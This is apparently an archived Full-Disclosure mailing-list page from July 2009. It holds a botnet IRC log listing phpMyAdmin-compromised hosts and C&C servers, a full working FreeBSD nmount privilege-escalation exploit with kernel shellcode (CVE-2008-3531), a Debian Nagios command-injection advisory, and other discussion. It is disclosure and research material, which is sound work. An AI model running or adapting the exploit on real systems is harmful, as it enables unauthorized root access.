http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip Presentation (IT Underground 2009): http://www.slideshare.net/fmavituna/one-click-ownage-1660539 Regards, -- http://ferruh.mavituna.com From johndo.jd at gmail.com Fri Jul 3 12:49:52 2009 From: johndo.jd at gmail.com (John Doe) Date: Fri, 3 Jul 2009 13:49:52 +0200 Subject: [Full-disclosure] phpMyAdmin exploited in masses Message-ID: Hi. Disclosing out of boredom and for the crawlers to archive. Keywords: phpmyadmin, web, exploit, zavod, devitalia, mwstudio, szervernet, infotel, oodrive, iceman, romania, scriptkiddie. An example of the phpmyadmin exploit used in masses without thinking. IRC server: irc10.iceman.ro has address 85.214.36.2 ( h747052.serverkompetenz.net) IRC port: 9999 A few domains that are webhosted on the same IP: freebid.de, soccertreff.de, junge-werbung.com, pocket.marktcom.de. Other possible IRC servers: irc11.iceman.ro has address 87.106.2.154 irc12.iceman.ro has address 85.214.84.18 irc14.iceman.ro has address 82.165.30.30 12:51 <@who> 110 out of 130 hosts, please wait a few minutes before kline ;) 12:51 < IceMan> eh lol =)))))))))) 12:51 < IceMan> 130 ? 12:52 < IceMan> ahaha 12:52 < IceMan> only the ones from root 12:52 < IceMan> :( 12:52 < IceMan> i have about 6000 12:52 <@who> anything else you want to share on the blog ? 12:53 < IceMan> you r makeing a bloog ? 12:53 < IceMan> blog* 12:53 <@who> no, i'm adding an entry. 12:53 < IceMan> =))) 12:53 < IceMan> on what blog ? 12:53 <@who> you'll know in time. 12:53 < IceMan> just dont add me 12:53 -!- Z [~kid at iceman.ro] has joined #phpmyadmin 12:53 < IceMan> i dont wanna become a "STAR" Hosts that made me stop scrolling for a second: 12:46 -!- ircb0t|558144 [~b0tz at static-241064.xdsl.raiffeisen.net] 12:52 -!- ircb0t|76136 [~b0tz at slice.corp.it] 12:50 -!- ircb0t|298636 [~b0tz at gw.zavod.ee] 12:50 -!- ircb0t|514818 [~b0tz at backup.szervernet.hu] 12:47 -!- ircb0t|803682 [~b0tz at b165.myrootshell.com] 12:47 -!- ircb0t|39903 [~b0tz at nomail.wietec.com] 12:46 -!- ircb0t|118029 [~b0tz at hermes.ac-net.at] 12:47 -!- ircb0t|426978 [~b0tz at mail.icable.at] 12:48 -!- ircb0t|622275 [www-data at brain.servercrew.de] 12:48 -!- ircb0t|896247 [~b0tz at www.mwstudio.hu] 12:48 -!- ircb0t|259056 [~b0tz at mailserver.devitalia.it] 12:49 -!- ircb0t|691775 [~b0tz at thomas.livenet.ch] 12:50 -!- ircb0t|735988 [www-data at imukuppi.org] 12:52 -!- ircb0t|981791 [~b0tz at doha.virtualbuilding.nl] 12:52 -!- ircb0t|376391 [~b0tz at crm.oodrive.com] 12:51 -!- ircb0t|305549 [~b0tz at azzinoth.decknet.fr] 12:50 -!- ircb0t|522103 [~b0tz at master.infotel.it] 12:50 -!- ircb0t|987422 [~b0tz at gentoo.stofan.sk] List of all visible clients (in #root) 12:41 -!- ircb0t|348728 [~b0tz at ip-81-11-185-103.dsl.scarlet.be] 12:41 -!- ircname : Linux 2.6.22-14-server 12:41 -!- ircb0t|546679 [~b0tz at webplus-1.nederhost.net] 12:41 -!- ircname : Linux 2.6.21-xen 12:46 -!- ircb0t|348728 [~b0tz at ip-81-11-185-103.dsl.scarlet.be] 12:46 -!- ircname : Linux 2.6.22-14-server 12:46 -!- ircb0t|546679 [~b0tz at webplus-1.nederhost.net] 12:46 -!- ircname : Linux 2.6.21-xen 12:46 -!- ircb0t|768952 [9e8d281efd at hartlep.eu] 12:46 -!- ircname : Linux 2.6.18 12:46 -!- ircb0t|100341 [www-data at bud125.internetdsl.tpnet.pl] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|360066 [~b0tz at neobitd.home.net.pl] 12:46 -!- ircname : Linux 2.6.23 12:46 -!- ircb0t|554117 [www-data at c-89-233-220-91.cust.bredband2.com] 12:46 -!- ircname : Linux 2.6.17 12:46 -!- ircb0t|789508 [~b0tz at 69.60.115.183] 12:46 -!- ircname : Linux 2.6.17-gentoo-r8 12:46 -!- ircb0t|109012 [~b0tz at moldau.trilos.net] 12:46 -!- ircname : Linux 2.6.17.7 12:46 -!- ircb0t|371797 [~ b0tz at 83-64-255-133.wiener-neudorf.xdsl-line.inode.at] 12:46 -!- ircname : Linux 2.6.19-gentoo-r5 12:46 -!- ircb0t|557516 [~b0tz at r02s01.colo.vollmar.net] 12:46 -!- ircname : Linux 2.6.18-4-686 12:46 -!- ircb0t|789854 [~b0tz at 86.92.26.138] 12:46 -!- ircname : Linux 2.6.18.1 12:46 -!- ircb0t|118029 [~b0tz at hermes.ac-net.at] 12:46 -!- ircname : Linux 2.6.18-4-vserver-686 12:46 -!- ircb0t|375254 [~b0tz at 217.157.23.239] 12:46 -!- ircname : Linux 2.6.15-1-686-smp 12:46 -!- ircb0t|558144 [~b0tz at static-241064.xdsl.raiffeisen.net] 12:46 -!- ircname : Linux 2.6.18-5-xen-amd64 12:46 -!- ircb0t|79389 [~b0tz at madletomas.netbox.cz] 12:46 -!- ircname : Linux 2.6.14.6 12:46 -!- ircb0t|118901 [~b0tz at nat-130-146.man.bydgoszcz.pl] 12:46 -!- ircname : Linux 2.6.23-gentoo-r3 12:46 -!- ircb0t|378649 [~b0tz at mail.jdj.com.pl] 12:46 -!- ircname : Linux 2.6.7-1-386 12:46 -!- ircb0t|564105 [~b0tz at srv-h64.esp.mediateam.fi] 12:46 -!- ircname : Linux 2.6.18-xenU 12:46 -!- ircb0t|794645 [~b0tz at 64.56.157.143] 12:46 -!- ircname : Linux 2.4.21-50.EL 12:46 -!- ircb0t|134194 [~b0tz at medimpex13.medimpex.tvnet.hu] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|394988 [~b0tz at m13s11.vlinux.de] 12:46 -!- ircname : Linux 2.6.18 12:46 -!- ircb0t|564960 [~b0tz at turbine.vnetworx.net] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|798421 [~b0tz at 89.104.213.130] 12:46 -!- ircname : Linux 2.6.18-gentoo-r3 12:46 -!- ircb0t|156819 [~b0tz at dye204.internetdsl.tpnet.pl] 12:46 -!- ircname : Linux 2.6.15-51-server 12:47 -!- ircb0t|39903 [~b0tz at nomail.wietec.com] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|573848 [~b0tz at 229.ispy.se] 12:47 -!- ircname : Linux 2.6.20-gentoo-r8 12:47 -!- ircb0t|803682 [~b0tz at b165.myrootshell.com] 12:47 -!- ircname : Linux 2.6.18-xenU-vmsp 12:47 -!- ircb0t|162770 [apache at 69.30.200.88] 12:47 -!- ircname : Linux 2.6.21-xen 12:47 -!- ircb0t|403023 [~b0tz at h081217003076.dyn.cm.kabsi.at] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|580961 [~b0tz at cpc2-brig14-0-0-cust582.brig.cable.ntl.com] 12:47 -!- ircname : Linux 2.6.17-gentoo-r8 12:47 -!- ircb0t|820387 [~b0tz at 193.222.137.23] 12:47 -!- ircname : Linux 2.6.18-3-xen-686 12:47 -!- ircb0t|165683 [~b0tz at c83-248-93-49.bredband.comhem.se] 12:47 -!- ircname : Linux 2.6.18-4-686 12:47 -!- ircb0t|416174 [~b0tz at 67-207-130-189.slicehost.net] 12:47 -!- ircname : Linux 2.6.18-xen 12:47 -!- ircb0t|587205 [~b0tz at 89-186-95-178.dcpool.ip.kpnqwest.it] 12:47 -!- ircname : Linux 2.6.21.5-grsec-2.1.10 12:47 -!- ircb0t|822064 [~b0tz at eurogift.amsterdam.dataweb.net] 12:47 -!- ircname : Linux 2.6.18-4-686 12:47 -!- ircb0t|169148 [~b0tz at BSN-77-187-53.static.dsl.siol.net] 12:47 -!- ircname : Linux 2.6.18-3-686 12:47 -!- ircb0t|420571 [www-data at 85.214.64.18] 12:47 -!- ircname : Linux 2.6.18-4-amd64 12:47 -!- ircb0t|593167 [~b0tz at 83.228.37.12] 12:47 -!- ircname : Linux 2.6.18 12:47 -!- ircb0t|854735 [~b0tz at 80.190.156.229] 12:47 -!- ircname : Linux 2.6.20-xen-r6 12:47 -!- ircb0t|42155 [www-data at 66-111-39-201.static.sagonet.net] 12:47 -!- ircname : Linux 2.6.18-3-686 12:47 -!- ircb0t|59751 [~b0tz at a62-251-30-68.adsl.xs4all.nl] 12:47 -!- ircname : Linux 2.6.20iptables 12:47 -!- ircb0t|857062 [~b0tz at 81.3.54.143] 12:47 -!- ircname : Linux 2.4.18-1-686-smp 12:47 -!- ircb0t|179951 [www-data at 195.56.146.54] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|424794 [~b0tz at 83.246.88.97] 12:47 -!- ircname : Linux 2.6.21-xen 12:47 -!- ircb0t|60325 [~b0tz at 83-103-96-60.ip.fastwebnet.it] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|873417 [~b0tz at 81-7-92-77.static.zebra.lt] 12:47 -!- ircname : Linux 2.6.18-2-amd64 12:47 -!- ircb0t|188869 [~b0tz at server.szechenyi-kap.sulinet.hu] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|426978 [~b0tz at mail.icable.at] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|612012 [~b0tz at 177.254-228-195.hosting.adatpark.hu] 12:47 -!- ircname : Linux 2.4.23 12:47 -!- ircb0t|876348 [~b0tz at business-89-132-156-81.business.broadband.hu] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|192095 [~b0tz at 195.113.99.195] 12:47 -!- ircname : Linux 2.6.18-5-686 12:48 -!- ircb0t|428332 [~b0tz at server.um.ustka.pl] 12:48 -!- ircname : Linux 2.6.24 12:48 -!- ircb0t|621921 [~b0tz at 62.214.74.163] 12:48 -!- ircname : Linux 2.6.18-4-686 12:48 -!- ircb0t|883442 [~b0tz at dvk98.internetdsl.tpnet.pl] 12:48 -!- ircname : Linux 2.6.17-pp3 12:48 -!- ircb0t|221125 [~b0tz at 89-186-141-237.dynamic.primacom.net] 12:48 -!- ircname : Linux 2.6.17-tie 12:48 -!- ircb0t|436737 [~b0tz at 89.140.182.76.static.user.ono.com] 12:48 -!- ircname : Linux 2.6.18-4-686 12:48 -!- ircb0t|622275 [www-data at brain.servercrew.de] 12:48 -!- ircname : Linux 2.6.21.5-sc-custom 12:48 -!- ircb0t|895729 [~b0tz at gnu.dh.bytemark.co.uk] 12:48 -!- ircname : Linux 2.6.18-4-xen-amd64 12:48 -!- ircb0t|23033 [~b0tz at india537.server4you.de] 12:48 -!- ircname : Linux 2.6.18-5-amd64 12:48 -!- ircb0t|451987 [~b0tz at rdlnet.de] 12:48 -!- ircname : Linux 2.6.18-4-amd64 12:48 -!- ircb0t|62334 [~b0tz at 217.66.131.5] 12:48 -!- ircname : Linux 2.4.20-64GB-SMP 12:48 -!- ircb0t|896247 [~b0tz at www.mwstudio.hu] 12:48 -!- ircname : Linux 2.6.18-3-686 12:48 -!- ircb0t|236167 [~b0tz at mail.icable.at] 12:48 -!- ircname : Linux 2.6.18-5-686 12:48 -!- ircb0t|462896 [~b0tz at cpe-69-204-233-96.nyc.res.rr.com] 12:48 -!- ircname : Linux 2.6.18-4-686 12:48 -!- ircb0t|6245 [~b0tz at ip565f1c5a.direct-adsl.nl] 12:48 -!- ircname : Linux 2.6.15 12:48 -!- ircb0t|919530 [~b0tz at enzo.opf.slu.cz] 12:48 -!- ircname : Linux 2.6.18-4-686 12:48 -!- ircb0t|241462 [~b0tz at 251.Red-217-127-103.staticIP.rima-tde.net] 12:48 -!- ircname : Linux 2.6.21 12:48 -!- ircb0t|464418 [~b0tz at 89-186-95-181.dcpool.ip.kpnqwest.it] 12:48 -!- ircname : Linux 2.6.21.5-grsec-2.1.10 12:48 -!- ircb0t|627647 [2 at bvz155.internetdsl.tpnet.pl] 12:48 -!- ircname : Linux 2.6.20.1newlinux 12:48 -!- ircb0t|919666 [~b0tz at wpc0335.amenworld.com] 12:48 -!- ircname : Linux 2.6.14-2-k7-smp 12:48 -!- ircb0t|245069 [~b0tz at 83.140.30.11] 12:48 -!- ircname : Linux 2.6.23.1 12:48 -!- ircb0t|466823 [~b0tz at 86.121.113.94] 12:48 -!- ircname : Linux 2.6.18-4-486 12:48 -!- ircb0t|636465 [~b0tz at 194.206.242.42] 12:48 -!- ircname : Linux 2.6.18-5-686 12:48 -!- ircb0t|920974 [~b0tz at 89.238.68.243] 12:48 -!- ircname : Linux 2.6.19.2 12:48 -!- ircb0t|259056 [~b0tz at mailserver.devitalia.it] 12:48 -!- ircname : Linux 2.6.18 12:48 -!- ircb0t|481214 [~b0tz at artistic.defeiter.nl] 12:48 -!- ircname : Linux 2.6.18-5-xen-amd64 12:48 -!- ircb0t|637750 [~b0tz at vserver59.antagus.de] 12:48 -!- ircname : Linux 2.6.18-openvz-686 12:48 -!- ircb0t|943697 [~b0tz at 89-97-166-49.ip18.fastwebnet.it] 12:48 -!- ircname : Linux 2.6.5-7.276-default 12:48 -!- ircb0t|262134 [~b0tz at alt126.com] 12:48 -!- ircname : Linux 2.6.21-2-686 12:48 -!- ircb0t|481565 [~b0tz at 80-219-1-88.dclient.hispeed.ch] 12:48 -!- ircname : Linux 2.6.18-5-686 12:49 -!- ircb0t|647797 [~b0tz at 111.84-48-221.nextgentel.com] 12:49 -!- ircname : Linux 2.6.19.2 12:49 -!- ircb0t|957069 [~b0tz at 83.98.163.59] 12:49 -!- ircname : Linux 2.6.18-4-xen-vserver-686 12:49 -!- ircb0t|262246 [~b0tz at 83.65.62.50] 12:49 -!- ircname : Linux 2.6.15-vs2.0.1-gentoo-r5 12:49 -!- ircb0t|481703 [~b0tz at 85.14.38.155] 12:49 -!- ircname : Linux 2.6.18-5-amd64 12:49 -!- ircb0t|691775 [~b0tz at thomas.livenet.ch] 12:49 -!- ircname : Linux 2.6.18-4-686 12:49 -!- ircb0t|959295 [~b0tz at carp-intohand-1.bath.ac.uk] 12:49 -!- ircname : Linux 2.6.18-4-686 12:49 -!- ircb0t|272591 [~b0tz at 195.34.173.43] 12:49 -!- ircname : Linux 2.6.18-5-xen-amd64 12:49 -!- ircb0t|483662 [~b0tz at 194.212.22.222] 12:49 -!- ircname : Linux 2.6.17-2-686 12:49 -!- ircb0t|707539 [~b0tz at 194.98.152.250] 12:49 -!- ircname : Linux 2.6.18.smpxeon 12:49 -!- ircb0t|966270 [~b0tz at mail.zstgm-ck.cz] 12:49 -!- ircname : Linux 2.6.17-gentoo-r4 12:49 -!- ircb0t|279374 [~b0tz at easyweb.dh.bytemark.co.uk] 12:49 -!- ircname : Linux 2.6.18-5-686 12:50 -!- ircb0t|723427 [~b0tz at casinoclub.mon.pi.se] 12:50 -!- ircname : Linux 2.6.18-4-amd64 12:50 -!- ircb0t|978793 [~b0tz at 195.43.57.151] 12:50 -!- ircname : Linux 2.6.20-gentoo-r8 12:50 -!- ircb0t|290106 [~b0tz at blackstar.tagi.pl] 12:50 -!- ircname : Linux 2.6.21-gentoo-r4Cez 12:50 -!- ircb0t|495011 [~b0tz at 194.44.218.36] 12:50 -!- ircname : Linux 2.6.11 12:50 -!- ircb0t|723430 [~b0tz at 30.Red-217-126-252.staticIP.rima-tde.net] 12:50 -!- ircname : Linux 2.6.17-12-generic 12:50 -!- ircb0t|979047 [www-data at 195.56.235.14] 12:50 -!- ircname : Linux 2.6.18-5-486 12:50 -!- ircb0t|298636 [~b0tz at gw.zavod.ee] 12:50 -!- ircname : Linux 2.6.18-4-686 12:50 -!- ircb0t|514818 [~b0tz at backup.szervernet.hu] 12:50 -!- ircname : Linux 2.6.12 12:50 -!- ircb0t|735988 [www-data at imukuppi.org] 12:50 -!- ircname : Linux 2.6.18-xenU 12:50 -!- ircb0t|987422 [~b0tz at gentoo.stofan.sk] 12:50 -!- ircname : Linux 2.6.15-gentoo-r1 12:50 -!- ircb0t|304829 [~b0tz at wwwserv-lin-16.teledata-fn.de] 12:50 -!- ircname : Linux 2.6.22.1 12:50 -!- ircb0t|522103 [~b0tz at master.infotel.it] 12:50 -!- ircname : Linux 2.4.22 12:51 -!- ircb0t|740290 [webftp at 83.168.220.73] 12:51 -!- ircname : Linux 2.6.17.4-cry.2-grsec 12:51 -!- ircb0t|991635 [~b0tz at 80.84.244.84] 12:51 -!- ircname : Linux 2.6.18.8-xenU 12:51 -!- ircb0t|305549 [~b0tz at azzinoth.decknet.fr] 12:51 -!- ircname : Linux 2.6.18-5-xen-686 12:51 -!- ircb0t|526760 [~b0tz at 83.98.163.59] 12:51 -!- ircname : Linux 2.6.18-4-xen-vserver-686 12:51 -!- ircb0t|740392 [~b0tz at host.9.140.23.62.rev.coltfrance.com] 12:51 -!- ircname : Linux 2.6.18-4-686 12:51 -!- ircb0t|996032 [~b0tz at 54038412.catv.pool.telekom.hu] 12:51 -!- ircname : Linux 2.6.18-5-686 12:51 -!- ircb0t|310964 [~b0tz at dum131.internetdsl.tpnet.pl] 12:51 -!- ircname : Linux 2.6.17-2-k7 12:51 -!- ircb0t|526834 [~ b0tz at 89-16-165-104.no-reverse-dns-set.bytemark.co.uk] 12:51 -!- ircname : Linux 2.6.18-5-xen-amd64 12:51 -!- ircb0t|743635 [~b0tz at casinoclub.mon.pi.se] 12:51 -!- ircname : Linux 2.6.18-4-amd64 12:52 -!- ircb0t|315372 [~b0tz at casinoclub.mon.pi.se] 12:52 -!- ircname : Linux 2.6.18-4-amd64 12:52 -!- ircb0t|526893 [~b0tz at apo155.internetdsl.tpnet.pl] 12:52 -!- ircname : Linux 2.6.18-5-686 12:52 -!- ircb0t|747204 [~b0tz at 89.191.21.168] 12:52 -!- ircname : Linux 2.6.18.xs4.0.1.900.5799 12:52 -!- ircb0t|327014 [2 at aks90.internetdsl.tpnet.pl] 12:52 -!- ircname : Linux 2.6.17-pp33 12:52 -!- ircb0t|530373 [~b0tz at 83.96.235.102] 12:52 -!- ircname : Linux 2.6.18-5-xen-686 12:52 -!- ircb0t|758109 [~b0tz at 81-233-118-147-no78.tbcn.telia.com] 12:52 -!- ircname : Linux 2.6.20.7 12:52 -!- ircb0t|342344 [~b0tz at 80.92.73.24] 12:52 -!- ircname : Linux 2.6.18-4-686 12:52 -!- ircb0t|544633 [~b0tz at 193.47.153.16] 12:52 -!- ircname : Linux 2.6.18-5-xen-vserver-686 12:52 -!- ircb0t|76136 [~b0tz at slice.corp.it] 12:52 -!- ircname : Linux 2.6.18-xen 12:52 -!- ircb0t|305280 [~b0tz at szerver2.klebi.sulinet.hu] 12:52 -!- ircname : Linux 2.6.18-5-486 12:52 -!- channels : @#rut 12:52 -!- ircb0t|376391 [~b0tz at crm.oodrive.com] 12:52 -!- ircname : Linux 2.6.9-5.EL 12:52 -!- ircb0t|981791 [~b0tz at doha.virtualbuilding.nl] 12:52 -!- ircname : Linux 2.6.10 12:52 -!- ircb0t|192265 [~b0tz at catv-89-135-13-240.catv.broadband.hu] 12:52 -!- ircname : Linux 2.6.18-5-686 12:52 -!- ircb0t|642093 [~b0tz at n6uid.spamband.com] 12:52 -!- ircname : Linux 2.6.18-5-686 Have a nice day Joe Doesntmatter -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090703/c8b8283c/attachment.html From argp at census-labs.com Thu Jul 2 21:51:42 2009 From: argp at census-labs.com (Patroklos Argyroudis) Date: Thu, 2 Jul 2009 23:51:42 +0300 Subject: [Full-disclosure] CVE-2008-3531 Message-ID: <20090702205142.GA2804@evola> /* * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com * * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount * (CVE-2008-3531) vulnerability: * * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531 * * For a detailed analysis see: * * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/ * * Sample run: * * [argp at leon ~]$ uname -rsi * FreeBSD 7.0-RELEASE GENERIC * [argp at leon ~]$ sysctl vfs.usermount * vfs.usermount: 1 * [argp at leon ~]$ id * uid=1001(argp) gid=1001(argp) groups=1001(argp) * [argp at leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531 * [argp at leon ~]$ ./cve-2008-3531 * [*] vptr = 0x006e776f * [*] calling nmount() * nmount: Unknown error: -1036235776 * [argp at leon ~]$ id * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp) * * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $ */ #include #include #include #include #include #include #include #include #include #include #include #include #define BUFSIZE 249 #define PAGESIZE 4096 #define ADDR 0x6e7000 #define OFFSET 1903 #define FSNAME "msdosfs" #define DIRPATH "/tmp/msdosfs" unsigned char kernelcode[] = "\x64\xa1\x00\x00\x00\x00" /* movl %fs:0, %eax # get curthread */ "\x8b\x40\x04" /* movl 0x4(%eax), %eax # get proc from curthread */ "\x8b\x40\x30" /* movl 0x30(%eax),%eax # get ucred from proc */ "\x31\xc9" /* xorl %ecx, %ecx # ecx = 0 */ "\x89\x48\x04" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */ "\x89\x48\x08" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */ /* # return to the pre-previous function, i.e. vfs_donmount() */ "\x81\xc4\xe8\x00\x00\x00" /* addl $0xe8, %esp */ "\x5b" /* popl %ebx */ "\x5e" /* popl %esi */ "\x5f" /* popl %edi */ "\x5d" /* popl %ebp */ "\xc3"; /* ret */ int main() { void *vptr; struct iovec iov[6]; vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0); if(vptr == MAP_FAILED) { perror("mmap"); exit(EXIT_FAILURE); } vptr += OFFSET; printf("[*] vptr = 0x%.8x\n", (unsigned int)vptr); memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1)); mkdir(DIRPATH, 0700); iov[0].iov_base = "fstype"; iov[0].iov_len = strlen(iov[0].iov_base) + 1; iov[1].iov_base = FSNAME; iov[1].iov_len = strlen(iov[1].iov_base) + 1; iov[2].iov_base = "fspath"; iov[2].iov_len = strlen(iov[2].iov_base) + 1; iov[3].iov_base = DIRPATH; iov[3].iov_len = strlen(iov[3].iov_base) + 1; iov[4].iov_base = calloc(BUFSIZE, sizeof(char)); if(iov[4].iov_base == NULL) { perror("calloc"); rmdir(DIRPATH); exit(EXIT_FAILURE); } memset(iov[4].iov_base, 0x41, (BUFSIZE - 1)); iov[4].iov_len = BUFSIZE; iov[5].iov_base = "BBBB"; iov[5].iov_len = strlen(iov[5].iov_base) + 1; printf("[*] calling nmount()\n"); if(nmount(iov, 6, 0) < 0) { perror("nmount"); rmdir(DIRPATH); exit(EXIT_FAILURE); } printf("[*] unmounting and deleting %s\n", DIRPATH); unmount(DIRPATH, 0); rmdir(DIRPATH); return EXIT_SUCCESS; } /* EOF */ From ge at linuxbox.org Fri Jul 3 01:25:23 2009 From: ge at linuxbox.org (Gadi Evron) Date: Fri, 03 Jul 2009 03:25:23 +0300 Subject: [Full-disclosure] a simple race condition and how you'd solve it Message-ID: <4A4D4FF3.8070101@linuxbox.org> A friend recently demonstrated on his blog a simple race condition he encountered. He also challenged folks to solve the problem. http://www.algorithm.co.il/blogs/index.php/programming/a-simple-race-condition/ There's an interesting discussion in the comments which is worth a quick read. Also, maybe someone here will come up with a cuter idea? Gadi. -- Gadi Evron, ge at linuxbox.org. Blog: http://gevron.livejournal.com/ From 3APA3A at SECURITY.NNOV.RU Fri Jul 3 13:58:13 2009 From: 3APA3A at SECURITY.NNOV.RU (Vladimir '3APA3A' Dubrovin) Date: Fri, 3 Jul 2009 16:58:13 +0400 Subject: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface In-Reply-To: <06DA44B99382B2428AD8DBFEE6CD209FAFD924@APOLLO.il.corp.radware.com> References: <06DA44B99382B2428AD8DBFEE6CD209FAFD924@APOLLO.il.corp.radware.com> Message-ID: <91435416.20090703165813@SECURITY.NNOV.RU> Dear Shaked Vax, Are you sure Radware Team have analysed reflected attack via user's browser (AppWall administrator visits malcrafted page, page redirects his request to AppWall) before excluding remote vector? --Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure at lists.grok.org.uk: SV> Radware team has completed analysis of the reported issue, concluding SV> that no AppWall customer using the product according to Radware SV> deployment recommendations would be exposed to vulnerability as a result SV> of this issue. This is due to the facts that this issue exists only on SV> the management interface that is recommended to be connection to SV> internal LAN only, and that it does not allow performing any actions SV> that would influence machine functionality. SV> Nevertheless, in order to enforce our commitment to deliver top SV> security solution to our customers, Radware will supply a fix for this SV> issue within its upcoming AppWall release. SV> Shaked Vax SV> AppWall Product Manager SV> ShakedV at radware.com SV> _______________________________________________ SV> Full-Disclosure - We believe in it. SV> Charter: http://lists.grok.org.uk/full-disclosure-charter.html SV> Hosted and sponsored by Secunia - http://secunia.com/ -- Skype: Vladimir.Dubrovin ~/ZARAZA http://securityvulns.com/ ?? ?????... ? ?????????? ????? ???????????? ???, ?? ??????? ????????????? ? ?????-?? ???????? ?????? ????. (????) From nion at debian.org Fri Jul 3 16:46:14 2009 From: nion at debian.org (Nico Golde) Date: Fri, 3 Jul 2009 17:46:14 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1825-1] New nagios2/nagios3 packages fix arbitrary code execution Message-ID: <20090703154614.GA302@ngolde.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-1825-1 security at debian.org http://www.debian.org/security/ Nico Golde July 3rd, 2009 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : nagios2, nagios3 Vulnerability : insufficient input validation Problem type : remote Debian-specific: no CVE ID : CVE-2009-2288 It was discovered that the statuswml.cgi script of nagios, a monitoring and management system for hosts, services and networks, is prone to a command injection vulnerability. Input to the ping and traceroute parameters of the script is not properly validated which allows an attacker to execute arbitrary shell commands by passing a crafted value to these parameters. For the oldstable distribution (etch), this problem has been fixed in version 2.6-2+etch3 of nagios2. For the stable distribution (lenny), this problem has been fixed in version 3.0.6-4~lenny2 of nagios3. For the testing distribution (squeeze), this problem has been fixed in version 3.0.6-5 of nagios3. For the unstable distribution (sid), this problem has been fixed in version 3.0.6-5 of nagios3. We recommend that you upgrade your nagios2/nagios3 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.diff.gz Size/MD5 checksum: 38428 42d830b18bfdeb3292cc926c81e93611 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6.orig.tar.gz Size/MD5 checksum: 2735504 900e3f4164f4b2a18485420eeaefe812 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.dsc Size/MD5 checksum: 1589 228a65351afe2ce6028c3e4b38a7dbd7 Architecture independent packages: http://security.debian.org/pool/updates/main/n/nagios3/nagios3-doc_3.0.6-4~lenny2_all.deb Size/MD5 checksum: 2070624 a3d6285aa4ca170dff3ebc37c661a87f http://security.debian.org/pool/updates/main/n/nagios3/nagios3-common_3.0.6-4~lenny2_all.deb Size/MD5 checksum: 76976 46391e4a013e6f4b9d22e7529f5836c2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_alpha.deb Size/MD5 checksum: 1652478 eeb78e031b3e0df336d473738bb849c3 http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_alpha.deb Size/MD5 checksum: 2256566 1691fcda957f56aa58d4a564249e3cc3 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_amd64.deb Size/MD5 checksum: 1533972 c161bf872c5d5e08188ab30d0ea47acc http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_amd64.deb Size/MD5 checksum: 2537724 75ea70e06091246d69457b3206e7dd57 arm architecture (ARM) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_arm.deb Size/MD5 checksum: 2219494 fac6212f49e1645e5e562753f342ea73 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_arm.deb Size/MD5 checksum: 1387152 40e50777dc68548be1cc4d9340074a78 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_armel.deb Size/MD5 checksum: 1444282 639e4563d6009d69c6684117a4d252cd http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_armel.deb Size/MD5 checksum: 2265242 a2874c655c74e88a52838fd0742544aa hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_hppa.deb Size/MD5 checksum: 1557384 49575bfdb3ce7ade125e560586eae41f http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_hppa.deb Size/MD5 checksum: 2362452 360e17eafca70d4124ef4aadb11498d1 i386 architecture (Intel ia32) 